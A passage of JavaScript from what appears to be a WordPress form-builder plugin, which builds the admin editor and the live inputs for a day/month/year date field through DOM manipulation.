		case 'month': 
		{ 
			w_width=document.getElementById('edit_for_month_size').value!=''?document.getElementById('edit_for_month_size').value:60;
			w_month=document.getElementById(id+"_monthform_id_temp").value;
			
			document.getElementById(id+"_td_date_input2").innerHTML='';
			
		var month = document.createElement('input');
			month.setAttribute("type", 'text');
			month.setAttribute("value", w_month);
			//month.setAttribute("class", "time_box");
			month.setAttribute("id", id+"_monthform_id_temp");
			month.setAttribute("name", id+"_monthform_id_temp");
			month.style.width=w_width+'px';
			month.setAttribute("onKeyPress", "return check_month(event, '"+id+"_monthform_id_temp')");
			month.setAttribute("onChange", "change_value('"+id+"_monthform_id_temp')");
			month.setAttribute("onBlur", "if (this.value=='0') this.value=''; else add_0('"+id+"_monthform_id_temp')");
			/*month.setAttribute("onKeyPress", "return check_minute(event, '"+i+"_mmform_id_temp')");
			month.setAttribute("onKeyUp", "change_minute(event, '"+i+"_mmform_id_temp')");
			month.setAttribute("onBlur", "add_0('"+i+"_mmform_id_temp')");*/

			document.getElementById(id+"_td_date_input2").appendChild(month);
			break;	
		}	
		case 'year':
		{ 
			w_width=document.getElementById('edit_for_year_size').value!=''?document.getElementById('edit_for_year_size').value:60;
			w_year=document.getElementById(id+"_yearform_id_temp").value;
			
			document.getElementById(id+"_td_date_input3").innerHTML='';
			
			from= parseInt(document.getElementById("edit_for_year_interval_from").value);
			to= parseInt(document.getElementById("edit_for_year_interval_to").value);
			if((parseInt(w_year)<from) || (parseInt(w_year)>to))
				w_year='';
			var year = document.createElement('input');
			year.setAttribute("type", 'text');
			year.setAttribute("value", w_year);
			//year.setAttribute("class", "time_box");
			year.setAttribute("id", id+"_yearform_id_temp");
			year.setAttribute("name", id+"_yearform_id_temp");
			year.setAttribute("onChange", "change_year('"+id+"_yearform_id_temp')");
			year.setAttribute("onKeyPress", "return check_year1(event, '"+id+"_yearform_id_temp')");
			year.setAttribute("onBlur", "check_year2('"+id+"_yearform_id_temp')");
			year.style.width=w_width+'px';
			year.setAttribute('from',from);
			year.setAttribute('to',to);

			document.getElementById(id+"_td_date_input3").appendChild(year);

			break;
		}
	}
	refresh_attr(id, 'type_date_fields');


}

function set_divider(id, divider)
{
	document.getElementById(id+"_separator1").innerHTML=divider;
	document.getElementById(id+"_separator2").innerHTML=divider;
}

function year_interval(id)
{
	from= parseInt(document.getElementById("edit_for_year_interval_from").value);
	to= parseInt(document.getElementById("edit_for_year_interval_to").value);
	if(to-from<0)
	{	
		alert('Invalid interval of years.');
		document.getElementById("edit_for_year_interval_from").value=to;
	}
	else
	{
		if(document.getElementById(id+"_yearform_id_temp").tagName=='SELECT')
			field_to_select(id, 'year');
		else
			field_to_text(id, 'year');
	}
}

function type_date_fields(i, w_field_label, w_field_label_size, w_field_label_pos, w_day, w_month, w_year, w_day_type, w_month_type, w_year_type, w_day_label, w_month_label, w_year_label, w_day_size, w_month_size, w_year_size, w_required, w_class, w_from, w_to, w_divider, w_attr_name, w_attr_value)
{ 
	current_date = new Date();
	document.getElementById("element_type").value = "type_date_fields";
	delete_last_child();
	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "3");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
	var edit_main_tr2  = document.createElement('tr');
	var edit_main_tr3  = document.createElement('tr');
	var edit_main_tr4  = document.createElement('tr');
	var edit_main_tr8  = document.createElement('tr');
	var edit_main_tr9  = document.createElement('tr');	
	var edit_main_tr5  = document.createElement('tr');
	var edit_main_tr6  = document.createElement('tr');
	var edit_main_tr7  = document.createElement('tr');
	var edit_main_tr10  = document.createElement('tr');  				
	var edit_main_tr11  = document.createElement('tr');  		
	var edit_main_tr12  = document.createElement('tr');  		
	var edit_main_tr13  = document.createElement('tr');  		
	var edit_main_tr14  = document.createElement('tr');  		
			
	var edit_main_td1 = document.createElement('td');
	var edit_main_td1_1 = document.createElement('td');
	var edit_main_td2 = document.createElement('td');
	var edit_main_td2_1 = document.createElement('td');
	var edit_main_td3 = document.createElement('td');
	var edit_main_td3_1 = document.createElement('td');
	var edit_main_td4 = document.createElement('td');
	var edit_main_td4_1 = document.createElement('td');
	var edit_main_td8 = document.createElement('td');
	var edit_main_td8_1 = document.createElement('td');
	var edit_main_td9 = document.createElement('td');
	var edit_main_td9_1 = document.createElement('td');
	var edit_main_td5 = document.createElement('td');
	var edit_main_td5_1 = document.createElement('td');
	var edit_main_td6 = document.createElement('td');
	var edit_main_td6_1 = document.createElement('td');
	var edit_main_td7 = document.createElement('td');
	var edit_main_td7_1 = document.createElement('td');
	var edit_main_td10 = document.createElement('td');
	var edit_main_td10_1 = document.createElement('td');
	var edit_main_td11 = document.createElement('td');
	var edit_main_td11_1 = document.createElement('td');
	var edit_main_td12 = document.createElement('td');
	var edit_main_td12_1 = document.createElement('td');
	var edit_main_td13 = document.createElement('td');
		edit_main_td13.style.cssText ="vertical-align:top;";
	var edit_main_td13_1 = document.createElement('td');
	var edit_main_td14 = document.createElement('td');
	var edit_main_td14_1 = document.createElement('td');
  
	var el_label_label = document.createElement('label');
		el_label_label.setAttribute("class", "fm-field-label");
		el_label_label.setAttribute("for", "edit_for_label");
		el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
		el_label_textarea.setAttribute("id", "edit_for_label");
		el_label_textarea.setAttribute("rows", "4");
		el_label_textarea.style.cssText = "width:200px;";
		el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
		el_label_textarea.innerHTML = w_field_label;
	
	var el_label_size_label = document.createElement('label');
		el_label_size_label.setAttribute("class", "fm-field-label");
	    el_label_size_label.setAttribute("for", "edit_for_label_size");
		el_label_size_label.innerHTML = "Field label size(px) ";
		
	var el_label_size = document.createElement('input');
	    el_label_size.setAttribute("id", "edit_for_label_size");
	    el_label_size.setAttribute("type", "text");
	    el_label_size.setAttribute("value", w_field_label_size);
		el_label_size.setAttribute("onKeyPress", "return check_isnum(event)");
        el_label_size.setAttribute("onKeyUp", "change_w_style('"+i+"_label_sectionform_id_temp', this.value)");
	
	var el_label_position_label = document.createElement('label');
		el_label_position_label.setAttribute("class", "fm-field-label");
		el_label_position_label.innerHTML = "Field label position";
	
	var el_label_position1 = document.createElement('input');
		el_label_position1.setAttribute("id", "edit_for_label_position_top");
		el_label_position1.setAttribute("type", "radio");
		el_label_position1.setAttribute("name", "edit_for_label_position");
		el_label_position1.setAttribute("onchange", "label_left("+i+")");
		el_label_position1.setAttribute("checked", "checked");
	
	var el_label_left = document.createElement('label');
		el_label_left.setAttribute("for", "edit_for_label_position_top");
        el_label_left.innerHTML = "Left";

	var el_label_position2 = document.createElement('input');
		el_label_position2.setAttribute("id", "edit_for_label_position_left");
		el_label_position2.setAttribute("type", "radio");
		el_label_position2.setAttribute("name", "edit_for_label_position");
		el_label_position2.setAttribute("onchange", "label_top("+i+")");
		
	var el_label_top = document.createElement('label');
		el_label_top.setAttribute("for", "edit_for_label_position_left");
        el_label_top.innerHTML = "Top";
		
	if(w_field_label_pos == "top")
		el_label_position2.setAttribute("checked", "checked");
	else
		el_label_position1.setAttribute("checked", "checked");

	var el_fields_divider_label = document.createElement('label');
		el_fields_divider_label.setAttribute("class", "fm-field-label");
		el_fields_divider_label.setAttribute("for", "edit_for_fields_divider");
		el_fields_divider_label.innerHTML = "Fields separator";
	
	var el_fields_divider = document.createElement('input');
        el_fields_divider.setAttribute("id", "edit_for_fields_divider");
        el_fields_divider.setAttribute("type", "text");
        el_fields_divider.setAttribute("value", w_divider);
        el_fields_divider.style.cssText = "width:80px";
        el_fields_divider.setAttribute("onKeyUp", "set_divider('"+i+"', this.value)");
			
/////////////////////////////////////////////////////////////////////////////////
//////////////////////////////// D A Y //////////////////////////////////////////
/////////////////////////////////////////////////////////////////////////////////
		
	var el_day_field_type_label = document.createElement('label');
		el_day_field_type_label.setAttribute("class", "fm-field-label");
		el_day_field_type_label.innerHTML = "Day field type";

	var el_day_field_type_input1 = document.createElement('input');
		el_day_field_type_input1.setAttribute("id", "el_day_field_type_text");
		el_day_field_type_input1.setAttribute("type", "radio");
		el_day_field_type_input1.setAttribute("value", "text");
		el_day_field_type_input1.setAttribute("name", "edit_for_day_field_type");
		el_day_field_type_input1.setAttribute("onchange", "field_to_text("+i+", 'day')");
	
	var el_day_label_text_1 = document.createElement('label');
		el_day_label_text_1.setAttribute("for", "el_day_field_type_text");
        el_day_label_text_1.innerHTML = "Input";	
		
	var el_day_field_type_input2 = document.createElement('input');
		el_day_field_type_input2.setAttribute("id", "el_day_field_type_select");
		el_day_field_type_input2.setAttribute("type", "radio");
		el_day_field_type_input2.setAttribute("value", "select");
		el_day_field_type_input2.setAttribute("name", "edit_for_day_field_type");
		el_day_field_type_input2.setAttribute("onchange", "field_to_select("+i+", 'day')");
		
	var el_day_label_select_1 = document.createElement('label');
		el_day_label_select_1.setAttribute("for", "el_day_field_type_select");
        el_day_label_select_1.innerHTML = "Select";		
	
	if(w_day_type == "SELECT")
		el_day_field_type_input2.setAttribute("checked", "checked");
	else
		el_day_field_type_input1.setAttribute("checked", "checked");
		
	var el_day_field_size_label = document.createElement('label');
	    el_day_field_size_label.setAttribute("class", "fm-field-label");
		el_day_field_size_label.setAttribute("for", "edit_for_day_size");
		el_day_field_size_label.innerHTML = "Day field size(px)";
	
	var el_day_field_size_input = document.createElement('input');
        el_day_field_size_input.setAttribute("id", "edit_for_day_size");
		el_day_field_size_input.setAttribute("type", "text");
		el_day_field_size_input.setAttribute("value", w_day_size);
		el_day_field_size_input.setAttribute("onKeyPress", "return check_isnum(event)");
		el_day_field_size_input.setAttribute("onKeyUp", "change_w_style('"+i+"_dayform_id_temp', this.value)");
		
	var el_day_field_text_label = document.createElement('label');
	    el_day_field_text_label.setAttribute("class", "fm-field-label");
		el_day_field_text_label.innerHTML = "Day label";
	
	var el_day_field_text_input = document.createElement('input');
        el_day_field_text_input.setAttribute("id", "edit_for_day_text");
		el_day_field_text_input.setAttribute("type", "text");
		el_day_field_text_input.setAttribute("value", w_day_label)
        el_day_field_text_input.setAttribute("onKeyUp", "change_w_label('"+i+"_day_label', this.value)");
							
/////////////////////////////////////////////////////////////////////////////////
//////////////////////////////// M O N T H //////////////////////////////////////
/////////////////////////////////////////////////////////////////////////////////
		
	var el_month_field_type_label = document.createElement('label');
		el_month_field_type_label.setAttribute("class", "fm-field-label");
		el_month_field_type_label.innerHTML = "Month field type";
	
	var el_month_field_type_input1 = document.createElement('input');
		el_month_field_type_input1.setAttribute("id", "el_month_field_type_text");
		el_month_field_type_input1.setAttribute("type", "radio");
		el_month_field_type_input1.setAttribute("value", "text");
		el_month_field_type_input1.setAttribute("name", "edit_for_month_field_type");
		el_month_field_type_input1.setAttribute("onchange", "field_to_text("+i+", 'month')");
		
	var el_day_label_text_2 = document.createElement('label');
		el_day_label_text_2.setAttribute("for", "el_month_field_type_text");
        el_day_label_text_2.innerHTML = "Input";
		
	var el_month_field_type_input2 = document.createElement('input');
		el_month_field_type_input2.setAttribute("id", "el_month_field_type_select");
		el_month_field_type_input2.setAttribute("type", "radio");
		el_month_field_type_input2.setAttribute("value", "select");
		el_month_field_type_input2.setAttribute("name", "edit_for_month_field_type");
		el_month_field_type_input2.setAttribute("onchange", "field_to_select("+i+", 'month')");
	
	var el_day_label_select_2 = document.createElement('label');
		el_day_label_select_2.setAttribute("for", "el_month_field_type_select");
        el_day_label_select_2.innerHTML = "Select";		
		
	if(w_month_type == "SELECT")
		el_month_field_type_input2.setAttribute("checked", "checked");
	else
		el_month_field_type_input1.setAttribute("checked", "checked");
		
	var el_month_field_size_label = document.createElement('label');
	    el_month_field_size_label.setAttribute("class", "fm-field-label");
		el_month_field_size_label.setAttribute("for", "edit_for_month_size");
		el_month_field_size_label.innerHTML = "Month field size(px) ";
	
	var el_month_field_size_input = document.createElement('input');
        el_month_field_size_input.setAttribute("id", "edit_for_month_size");
		el_month_field_size_input.setAttribute("type", "text");
		el_month_field_size_input.setAttribute("value", w_month_size);
		el_month_field_size_input.setAttribute("onKeyPress", "return check_isnum(event)");
		el_month_field_size_input.setAttribute("onKeyUp", "change_w_style('"+i+"_monthform_id_temp', this.value)");
				
	var el_month_field_text_label = document.createElement('label');
	    el_month_field_text_label.setAttribute("class", "fm-field-label");
		el_month_field_text_label.innerHTML = "Month label";
	
	var el_month_field_text_input = document.createElement('input');
        el_month_field_text_input.setAttribute("id", "edit_for_month_text");
		el_month_field_text_input.setAttribute("type", "text");
		el_month_field_text_input.setAttribute("value", w_month_label);
        el_month_field_text_input.setAttribute("onKeyUp", "change_w_label('"+i+"_month_label', this.value)");
		
/////////////////////////////////////////////////////////////////////////////////
////////////////////////////////  Y E A R  //////////////////////////////////////
/////////////////////////////////////////////////////////////////////////////////
		
	var el_year_field_type_label = document.createElement('label');
		el_year_field_type_label.setAttribute("class", "fm-field-label");
		el_year_field_type_label.innerHTML = "Year field type";
	
	var el_year_field_type_input1 = document.createElement('input');
		el_year_field_type_input1.setAttribute("id", "el_year_field_type_text");
		el_year_field_type_input1.setAttribute("type", "radio");
		el_year_field_type_input1.setAttribute("value", "text");
		el_year_field_type_input1.setAttribute("name", "edit_for_year_field_type");
		el_year_field_type_input1.setAttribute("onchange", "field_to_text("+i+", 'year')");
		
	var el_day_label_text_3 = document.createElement('label');
		el_day_label_text_3.setAttribute("for", "el_year_field_type_text");
        el_day_label_text_3.innerHTML = "Text";		
		
	var el_year_field_type_input2 = document.createElement('input');
		el_year_field_type_input2.setAttribute("id", "el_year_field_type_select");
		el_year_field_type_input2.setAttribute("type", "radio");
		el_year_field_type_input2.setAttribute("value", "select");
		el_year_field_type_input2.setAttribute("name", "edit_for_year_field_type");
		el_year_field_type_input2.setAttribute("onchange", "field_to_select("+i+", 'year')");
		
	var el_day_label_select_3 = document.createElement('label');
		el_day_label_select_3.setAttribute("for", "el_year_field_type_select");
        el_day_label_select_3.innerHTML = "Select";		
		
	if(w_year_type == "SELECT")
		el_year_field_type_input2.setAttribute("checked", "checked");
	else
		el_year_field_type_input1.setAttribute("checked", "checked");
		
	var el_year_field_interval_label = document.createElement('label');
		el_year_field_interval_label.setAttribute("class", "fm-field-label");
		el_year_field_interval_label.innerHTML = "Year interval";
	
	var el_year_field_interval_from_input = document.createElement('input');
        el_year_field_interval_from_input.setAttribute("id", "edit_for_year_interval_from");
		el_year_field_interval_from_input.setAttribute("type", "text");
		el_year_field_interval_from_input.setAttribute("value", w_from);
		el_year_field_interval_from_input.style.cssText ="width:40px";
		el_year_field_interval_from_input.setAttribute("onKeyPress", "return check_isnum(event)");
        el_year_field_interval_from_input.setAttribute("onChange", "year_interval("+i+")");
		
	Line = document.createTextNode(" - ");
	if(w_to == current_date.getFullYear())
		w_to_left = '';
	else
		w_to_left = w_to;
	var el_year_field_interval_to_input = document.createElement('input');
        el_year_field_interval_to_input.setAttribute("id", "edit_for_year_interval_to");
		el_year_field_interval_to_input.setAttribute("type", "text");
		el_year_field_interval_to_input.setAttribute("value", w_to);
		el_year_field_interval_to_input.style.cssText = "width:40px";
		el_year_field_interval_to_input.setAttribute("onKeyPress", "return check_isnum(event)");
        el_year_field_interval_to_input.setAttribute("onChange", "year_interval("+i+")");
	
	var el_year_field_interval_to_span = document.createElement('div');
		el_year_field_interval_to_span.style.cssText ="color:red; width:275px;";
		el_year_field_interval_to_span.innerHTML ="Leave the second field empty and the current year will be used automatically. For a specific year (other than current) fill out both the start and finish points of the range.";
	
	var el_year_field_size_label = document.createElement('label');
	    el_year_field_size_label.setAttribute("class", "fm-field-label");
		el_year_field_size_label.setAttribute("for", "edit_for_year_size");
		el_year_field_size_label.innerHTML = "Year field size(px)";
	
	var el_year_field_size_input = document.createElement('input');
        el_year_field_size_input.setAttribute("id", "edit_for_year_size");
		el_year_field_size_input.setAttribute("type", "text");
		el_year_field_size_input.setAttribute("value", w_year_size);
		el_year_field_size_input.setAttribute("onKeyPress", "return check_isnum(event)");
        el_year_field_size_input.setAttribute("onKeyUp", "change_w_style('"+i+"_yearform_id_temp', this.value)");
				
	var el_year_field_text_label = document.createElement('label');
	    el_year_field_text_label.setAttribute("class", "fm-field-label");
		el_year_field_text_label.innerHTML = "Year label";
	
	var el_year_field_text_input = document.createElement('input');
        el_year_field_text_input.setAttribute("id", "edit_for_year_text");
		el_year_field_text_input.setAttribute("type", "text");
		el_year_field_text_input.setAttribute("value", w_year_label);
        el_year_field_text_input.setAttribute("onKeyUp", "change_w_label('"+i+"_year_label', this.value)");		
				
	var el_style_label = document.createElement('label');
		el_style_label.setAttribute("class", "fm-field-label");
		el_style_label.setAttribute("for", "el_style_textarea");
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
		el_style_textarea.setAttribute("id", "el_style_textarea");
		el_style_textarea.setAttribute("type", "text");
		el_style_textarea.setAttribute("value", w_class);
		el_style_textarea.style.cssText = "width:200px;";
		el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_required_label = document.createElement('label');
		el_required_label.setAttribute("class", "fm-field-label");
		el_required_label.setAttribute("for", "el_required");
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
		el_required.setAttribute("id", "el_required");
		el_required.setAttribute("type", "checkbox");       
		el_required.setAttribute("onclick", "set_required('"+i+"_required')");
		if(w_required == "yes")
			el_required.setAttribute("checked", "checked");
		
	var el_attr_label = document.createElement('label');
		el_attr_label.setAttribute("class", "fm-field-label");
		el_attr_label.innerHTML = "Additional Attributes";
	var el_attr_add = document.createElement('img');      
		el_attr_add.setAttribute("src", plugin_url + '/images/add.png?ver=1.8.0');
		el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
		el_attr_add.setAttribute("title", 'add');
		el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_date_fields')");
	var el_attr_table = document.createElement('table');
		el_attr_table.setAttribute("id", 'attributes');
		el_attr_table.setAttribute("border", '0');
		el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
		el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
		el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
		el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
		el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
		el_attr_name_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
		el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
		el_attr_value_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
		el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n = w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
			el_attr_name.setAttribute("type", "text");
			el_attr_name.style.cssText = "width:100px";
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_date_fields')");
			
		var el_attr_value = document.createElement('input');
			el_attr_value.setAttribute("type", "text");
			el_attr_value.style.cssText = "width:100px";
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_date_fields')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_add.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px';
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_date_fields')");
			
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);	
	}

	var t  = document.getElementById('edit_table');
	var br = document.createElement('br');
	var br6 = document.createElement('br');
	var br7 = document.createElement('br');
	var br8 = document.createElement('br');
	var br9 = document.createElement('br');
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);

	edit_main_td10.appendChild(el_label_size_label);
	edit_main_td10_1.appendChild(el_label_size);
	
	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(el_label_left);
	edit_main_td2_1.appendChild(br);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(el_label_top);

	edit_main_td3.appendChild(el_fields_divider_label);
	edit_main_td3_1.appendChild(el_fields_divider);
	
	edit_main_td4.appendChild(el_day_field_type_label);
	edit_main_td4_1.appendChild(el_day_field_type_input1);
	edit_main_td4_1.appendChild(el_day_label_text_1);
	edit_main_td4_1.appendChild(el_day_field_type_input2);
	edit_main_td4_1.appendChild(el_day_label_select_1);

	edit_main_td11.appendChild(el_day_field_size_label);
	edit_main_td11_1.appendChild(el_day_field_size_input);
	
	edit_main_td8.appendChild(el_month_field_type_label);
	edit_main_td8_1.appendChild(el_month_field_type_input1);
	edit_main_td8_1.appendChild(el_day_label_text_2);
	edit_main_td8_1.appendChild(el_month_field_type_input2);
	edit_main_td8_1.appendChild(el_day_label_select_2);
	
	edit_main_td12.appendChild(el_month_field_size_label);
	edit_main_td12_1.appendChild(el_month_field_size_input);
	
	edit_main_td9.appendChild(el_year_field_type_label);
	edit_main_td9_1.appendChild(el_year_field_type_input1);
	edit_main_td9_1.appendChild(el_day_label_text_3);
	edit_main_td9_1.appendChild(el_year_field_type_input2);
	edit_main_td9_1.appendChild(el_day_label_select_3);
	
	edit_main_td13.appendChild(el_year_field_interval_label);
	edit_main_td13_1.appendChild(el_year_field_interval_from_input);
	edit_main_td13_1.appendChild(Line);
	edit_main_td13_1.appendChild(el_year_field_interval_to_input);
	edit_main_td13_1.appendChild(el_year_field_interval_to_span);

	edit_main_td14.appendChild(el_year_field_size_label);
	edit_main_td14_1.appendChild(el_year_field_size_input);
	
	edit_main_td5.appendChild(el_style_label);
	edit_main_td5_1.appendChild(el_style_textarea);
	
	edit_main_td6.appendChild(el_required_label);
	edit_main_td6_1.appendChild(el_required);
	
	
	
	edit_main_td7.appendChild(el_attr_label);
	edit_main_td7.appendChild(el_attr_add);
	edit_main_td7.appendChild(br8);
	edit_main_td7.appendChild(el_attr_table);
	edit_main_td7.setAttribute("colspan", "2");

	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr10.appendChild(edit_main_td10);
	edit_main_tr10.appendChild(edit_main_td10_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr11.appendChild(edit_main_td11);
	edit_main_tr11.appendChild(edit_main_td11_1);
	edit_main_tr8.appendChild(edit_main_td8);
	edit_main_tr8.appendChild(edit_main_td8_1);
	edit_main_tr12.appendChild(edit_main_td12);
	edit_main_tr12.appendChild(edit_main_td12_1);
	edit_main_tr9.appendChild(edit_main_td9);
	edit_main_tr9.appendChild(edit_main_td9_1);
	edit_main_tr13.appendChild(edit_main_td13);
	edit_main_tr13.appendChild(edit_main_td13_1);
	edit_main_tr14.appendChild(edit_main_td14);
	edit_main_tr14.appendChild(edit_main_td14_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr7.appendChild(edit_main_td7_1);
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr10);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr11);
	edit_main_table.appendChild(edit_main_tr8);
	edit_main_table.appendChild(edit_main_tr12);
	edit_main_table.appendChild(edit_main_tr9);
	edit_main_table.appendChild(edit_main_tr13);
	edit_main_table.appendChild(edit_main_tr14);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr6);
	edit_main_table.appendChild(edit_main_tr7);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	add_id_and_name(i, 'type_date_fields');

	var adding_type = document.createElement("input");
		adding_type.setAttribute("type", "hidden");
		adding_type.setAttribute("value", "type_date_fields");
		adding_type.setAttribute("name", i+"_typeform_id_temp");
		adding_type.setAttribute("id", i+"_typeform_id_temp");
		
	var adding_required = document.createElement("input");
		adding_required.setAttribute("type", "hidden");
		adding_required.setAttribute("value", w_required);
		adding_required.setAttribute("name", i+"_requiredform_id_temp");
		adding_required.setAttribute("id", i+"_requiredform_id_temp");
		
	var edit_labels = document.createTextNode("The labels of the fields are editable. Please, click the label to edit.");	
	var div = document.createElement('div');
		div.setAttribute("id", "main_div");
	
	var div_for_editable_labels = document.createElement('div');
		div_for_editable_labels.setAttribute("style", "margin-left:4px; color:red;");
		div_for_editable_labels.appendChild(edit_labels);  

	var div_field = document.createElement('div');
		div_field.setAttribute("id", i+"_elemet_tableform_id_temp");
					
	var div_label = document.createElement('div');
		div_label.setAttribute("align", 'left');
		div_label.style.cssText = 'display:table-cell; vertical-align:top; width:'+w_field_label_size+'px';
		div_label.setAttribute("id", i+"_label_sectionform_id_temp");
		
	var div_element = document.createElement('div');
		div_element.setAttribute("align", 'left');
		div_element.style.display="table-cell";
		div_element.setAttribute("id", i+"_element_sectionform_id_temp");

	var table_date = document.createElement('div');
		table_date.setAttribute("id", i+"_table_date");
		table_date.style.display="table";

	var tr_date1 = document.createElement('div');
		tr_date1.setAttribute("id", i+"_tr_date1");
		tr_date1.style.display="table-row";
		
	var tr_date2 = document.createElement('div');
		tr_date2.setAttribute("id", i+"_tr_date2");
		tr_date2.style.display="table-row";
		
	var td_date_input1 = document.createElement('div');
		td_date_input1.setAttribute("id", i+"_td_date_input1");
		td_date_input1.style.display = "table-cell";
		
	var td_date_separator1 = document.createElement('div');
		td_date_separator1.setAttribute("id", i+"_td_date_separator1");
		td_date_separator1.style.display="table-cell";
		
	var td_date_input2 = document.createElement('div');
		td_date_input2.setAttribute("id", i+"_td_date_input2");
		td_date_input2.style.display = "table-cell";
		
	var td_date_separator2 = document.createElement('div');
		td_date_separator2.setAttribute("id", i+"_td_date_separator2");
		td_date_separator2.style.display = "table-cell";
		
	var td_date_input3 = document.createElement('div');
		td_date_input3.setAttribute("id", i+"_td_date_input3");
		td_date_input3.style.display = "table-cell";

	var td_date_label1 = document.createElement('div');
		td_date_label1.setAttribute("id", i+"_td_date_label1");
		td_date_label1.style.display="table-cell";
			
	var td_date_label_empty1 = document.createElement('div');
		td_date_label_empty1.style.display="table-cell";
		
	var td_date_label2 = document.createElement('div');
		td_date_label2.setAttribute("id", i+"_td_date_label2");
		td_date_label2.style.display="table-cell";
	var td_date_label_empty2 = document.createElement('div');
		td_date_label_empty2.style.display="table-cell";
		
	var td_date_label3 = document.createElement('div');
		td_date_label3.setAttribute("id", i+"_td_date_label3");
		td_date_label3.style.display="table-cell";

	var label = document.createElement('span');
		label.setAttribute("id", i+"_element_labelform_id_temp");
		label.innerHTML = w_field_label;
		label.setAttribute("class", "wd_form_label");
		label.style.verticalAlign="top";
		
	var required = document.createElement('span');
		required.setAttribute("id", i+"_required_elementform_id_temp");
		required.innerHTML = "";
		required.setAttribute("class", "required");
		required.style.verticalAlign="top";
		if(w_required == "yes")
			required.innerHTML = " *";

	var day = document.createElement('input');
		day.setAttribute("type", 'text');
		day.setAttribute("value", w_day);
	    day.setAttribute("id", i+"_dayform_id_temp");
	    day.setAttribute("name", i+"_dayform_id_temp");
		day.setAttribute("onChange", "change_value('"+i+"_dayform_id_temp')");
		day.setAttribute("onKeyPress", "return check_day(event, '"+i+"_dayform_id_temp')");
	    day.setAttribute("onBlur", "if (this.value=='0') this.value=''; else add_0('"+i+"_dayform_id_temp')");
		day.style.width = w_day_size+'px';

	var day_label = document.createElement('label');
	    day_label.setAttribute("class", "mini_label");
	    day_label.setAttribute("id", i+"_day_label");
	    day_label.innerHTML = w_day_label;
			
	var day_ = document.createElement('span');
	    day_.setAttribute("id", i+"_separator1");
	    day_.setAttribute("class", "wdform_separator");
	    day_.innerHTML = w_divider;
		
	var month = document.createElement('input');
        month.setAttribute("type", 'text');
		month.setAttribute("value", w_month);
		month.setAttribute("id", i+"_monthform_id_temp");
